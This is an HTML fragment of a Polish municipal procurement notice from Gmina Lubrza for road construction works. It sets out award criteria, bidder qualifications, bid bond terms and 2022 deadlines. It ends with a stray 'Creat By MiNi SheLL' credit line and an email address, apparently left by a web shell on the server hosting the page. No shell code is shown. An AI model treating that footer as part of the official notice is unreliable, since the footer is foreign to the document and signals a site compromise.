class="mb-0">45233300-2 - Fundamentowanie autostrad, dróg, ulic i ścieżek ruchu pieszego</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje warunków udziału w postępowaniu w tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie formułuje warunków udziału w postępowaniu w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej - Zamawiający nie formułuje warunków udziału w postępowaniu w tym zakresie;<br/>4) zdolności technicznej lub zawodowej - Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert o udzielenie zamówienia, a w przypadku, gdy okres<br/>prowadzenia działalności jest krótszy, w tym okresie, wykonał należycie:<br/>- roboty budowlane o wartości łącznej nie mniejszej niż 2 000 000,00 zł brutto, obejmujące budowę, przebudowę, modernizację lub remont drogi, z których każda musi być na kwotę min. 250 000,00 zł;<br/>b) dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia: tj.<br/>• dysponuje kierownikiem budowy (do kierowania robotami budowlanymi) w specjalności inżynieryjnej drogowej bez ograniczeń oraz posiadającym min. 3 letnie doświadczenie w kierowaniu ww. robotami oraz<br/>• kierownikiem budowy w specjalności instalacyjnej sanitarnej bez ograniczeń oraz posiadającym min. 3 letnie doświadczenie w kierowaniu ww. robotami <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy PZP, sporządzony nie wcześniej niż 3<br/>miesiące przed jego złożeniem,<br/>- zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 1 ustawy PZP,<br/>- zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 1 ustawy PZP,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór wykazu robót budowlanych stanowi załącznik nr 3 do SWZ; Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa powyżej dotyczy robót<br/>budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył;<br/>- wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi oraz sanitarnymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu osób stanowi załącznik nr 4 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>część I: 60 000,00 zł (słownie: sześćdziesiąt tysięcy złotych; 00/100 złotych);<br/>część II: 60 000,00 zł (słownie: sześćdziesiąt tysięcy złotych; 00/100 złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert. Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto Urzędu Gminy w Lubrzy w Banku Spółdzielczym w Prudniku nr rachunku: 02 8905 0000 2000 0010 1114 0003 tytuł przelewu: „Wadium – postępowanie V.271.8.2022 – część ….”.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) winno zostać złożone w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym przez wystawce poręczenia lub gwarancji;<br/>2) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP;<br/>3) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>4) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>5) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>6) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>7) beneficjentem poręczenia lub gwarancji jest: Gmina Lubrza;<br/>8) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>7. Wadium w innej formie niż pieniężna wnosi się wraz z ofertą w sposób przewidziany dla oferty.<br/>8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>3. W przypadku, o którym mowa w ust. 2, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje poza okolicznościami wymienionymi w ustawie Prawo zamówień publicznych, możliwość wprowadzenia zmian do postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiany zawartej umowy zostały opisane w istotnych postanowieniach umowy – załącznik nr 5 oraz 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania ofert dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika systemu miniPoratal-ePUAP dostępnej na miniPortalu pod adresem: https://miniportal.uzp.gov.pl/Instrukcje</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-25 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com